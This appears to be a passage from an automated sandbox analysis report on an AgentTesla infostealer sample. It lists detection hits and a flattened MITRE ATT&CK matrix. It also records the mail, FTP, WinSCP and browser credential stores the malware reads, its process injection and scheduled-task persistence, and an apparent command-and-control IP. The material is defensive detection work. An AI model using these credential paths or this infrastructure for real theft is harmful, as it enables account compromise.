                  Source: Yara matchFile source: 0.2.pdP5Rv9pPW.exe.3996170.1.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 00000002.00000000.363305097.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000000.00000002.380144248.0000000003991000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000002.00000002.537927671.0000000006AF1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000017.00000002.585255160.000000000721C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: pdP5Rv9pPW.exe PID: 5704, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: vbc.exe PID: 5224, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: vbc.exe PID: 1608, type: MEMORYSTR
                  Tries to steal Mail credentials (via file / registry access)
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.iniJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.iniJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeKey opened: HKEY_CURRENT_USER\Software\IncrediMail\IdentitiesJump to behavior
                  Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\SessionsJump to behavior
                  Tries to harvest and steal ftp login credentials
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeFile opened: C:\Users\user\AppData\Roaming\FileZilla\recentservers.xmlJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeFile opened: C:\Users\user\AppData\Roaming\SmartFTP\Client 2.0\Favorites\Quick Connect\Jump to behavior
                  Tries to harvest and steal browser information (history, passwords, etc)
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.iniJump to behavior
                  Source: Yara matchFile source: 00000002.00000002.537927671.0000000006AF1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000017.00000002.585255160.000000000721C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: vbc.exe PID: 5224, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: vbc.exe PID: 1608, type: MEMORYSTR

                  Remote Access Functionality

                  barindex
                  Yara detected AgentTesla
                  Source: Yara matchFile source: 2.0.vbc.exe.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.pdP5Rv9pPW.exe.3996170.1.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.pdP5Rv9pPW.exe.39ca790.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.pdP5Rv9pPW.exe.39ca790.0.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.pdP5Rv9pPW.exe.3996170.1.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 00000002.00000000.363305097.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000000.00000002.380144248.0000000003991000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000002.00000002.537927671.0000000006AF1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000017.00000002.585255160.000000000721C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: pdP5Rv9pPW.exe PID: 5704, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: vbc.exe PID: 5224, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: vbc.exe PID: 1608, type: MEMORYSTR

                  Mitre Att&ck Matrix

                  Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
                  1
                  Valid Accounts                  		211
                  Windows Management Instrumentation                  		1
                  Valid Accounts                  		1
                  Valid Accounts                  		1
                  Disable or Modify Tools                  		2
                  OS Credential Dumping                  		1
                  Account Discovery                  		Remote Services11
                  Archive Collected Data                  		Exfiltration Over Other Network Medium1
                  Encrypted Channel                  		Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
                  Default Accounts1
                  Shared Modules                  		1
                  Scheduled Task/Job                  		1
                  Access Token Manipulation                  		11
                  Deobfuscate/Decode Files or Information                  		11
                  Input Capture                  		114
                  System Information Discovery                  		Remote Desktop Protocol2
                  Data from Local System                  		Exfiltration Over Bluetooth1
                  Non-Application Layer Protocol                  		Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
                  Domain Accounts1
                  Exploitation for Client Execution                  		1
                  Registry Run Keys / Startup Folder                  		311
                  Process Injection                  		21
                  Obfuscated Files or Information                  		1
                  Credentials in Registry                  		221
                  Security Software Discovery                  		SMB/Windows Admin Shares1
                  Email Collection                  		Automated Exfiltration11
                  Application Layer Protocol                  		Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
                  Local Accounts1
                  Scheduled Task/Job                  		Logon Script (Mac)1
                  Scheduled Task/Job                  		1
                  Software Packing                  		NTDS1
                  Process Discovery                  		Distributed Component Object Model11
                  Input Capture                  		Scheduled TransferProtocol ImpersonationSIM Card SwapCarrier Billing Fraud
                  Cloud AccountsCronNetwork Logon Script1
                  Registry Run Keys / Startup Folder                  		1
                  Masquerading                  		LSA Secrets141
                  Virtualization/Sandbox Evasion                  		SSH1
                  Clipboard Data                  		Data Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
                  Replication Through Removable MediaLaunchdRc.commonRc.common1
                  Valid Accounts                  		Cached Domain Credentials1
                  Application Window Discovery                  		VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
                  External Remote ServicesScheduled TaskStartup ItemsStartup Items1
                  Access Token Manipulation                  		DCSync1
                  System Owner/User Discovery                  		Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
                  Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/Job141
                  Virtualization/Sandbox Evasion                  		Proc FilesystemNetwork Service ScanningShared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue
                  Exploit Public-Facing ApplicationPowerShellAt (Linux)At (Linux)311
                  Process Injection                  		/etc/passwd and /etc/shadowSystem Network Connections DiscoverySoftware Deployment ToolsData StagedExfiltration Over Asymmetric Encrypted Non-C2 ProtocolWeb ProtocolsRogue Cellular Base StationData Destruction
                  Supply Chain CompromiseAppleScriptAt (Windows)At (Windows)1
                  Hidden Files and Directories                  		Network SniffingProcess DiscoveryTaint Shared ContentLocal Data StagingExfiltration Over Unencrypted/Obfuscated Non-C2 ProtocolFile Transfer ProtocolsData Encrypted for Impact

                  Behavior Graph

                  Hide Legend

                  Legend:

                  • Process
                  • Signature
                  • Created File
                  • DNS/IP Info
                  • Is Dropped
                  • Is Windows Process
                  • Number of created Registry Values
                  • Number of created Files
                  • Visual Basic
                  • Delphi
                  • Java
                  • .Net C# or VB.NET
                  • C, C++ or other language
                  • Is malicious
                  • Internet
                  behaviorgraph top1 signatures2 2 Behavior Graph ID: 691823 Sample: pdP5Rv9pPW.exe Startdate: 28/08/2022 Architecture: WINDOWS Score: 100 64 Snort IDS alert for network traffic 2->64 66 Multi AV Scanner detection for domain / URL 2->66 68 Malicious sample detected (through community Yara rule) 2->68 70 6 other signatures 2->70 7 pdP5Rv9pPW.exe 4 2->7         started        11 fghn.exe 3 2->11         started        13 excel.exe 1 2->13         started        15 excel.exe 1 2->15         started        process3 file4 60 C:\Users\user\AppData\...\pdP5Rv9pPW.exe.log, ASCII 7->60 dropped 84 Writes to foreign memory regions 7->84 86 Injects a PE file into a foreign processes 7->86 17 vbc.exe 17 4 7->17         started        22 cmd.exe 3 7->22         started        24 cmd.exe 2 7->24         started        26 cmd.exe 1 7->26         started        88 Multi AV Scanner detection for dropped file 11->88 90 Machine Learning detection for dropped file 11->90 28 vbc.exe 3 11->28         started        30 cmd.exe 1 11->30         started        36 2 other processes 11->36 92 Document exploit detected (process start blacklist hit) 13->92 94 Injects files into Windows application 13->94 32 conhost.exe 13->32         started        34 conhost.exe 15->34         started        signatures5 process6 dnsIp7 62 141.98.6.75, 49717, 49753, 80 CMCSUS Germany 17->62 54 C:\Users\user\AppData\Roaming\...\excel.exe, PE32 17->54 dropped 72 Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc) 17->72 74 Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines) 17->74 76 Tries to steal Mail credentials (via file / registry access) 17->76 82 4 other signatures 17->82 56 C:\Users\user\AppData\Roaming\fghn\fghn.exe, PE32 22->56 dropped 58 C:\Users\user\...\fghn.exe:Zone.Identifier, ASCII 22->58 dropped 38 conhost.exe 22->38         started        78 Uses schtasks.exe or at.exe to add and modify task schedules 24->78 40 conhost.exe 24->40         started        42 conhost.exe 26->42         started        44 schtasks.exe 1 26->44         started        80 Hides that the sample has been downloaded from the Internet (zone.identifier) 28->80 46 conhost.exe 30->46         started        48 schtasks.exe 1 30->48         started        50 conhost.exe 36->50         started        52 conhost.exe 36->52         started        file8 signatures9 process10

                  Screenshots

                  Thumbnails

                  This section contains all screenshots as thumbnails, including those not shown in the slideshow.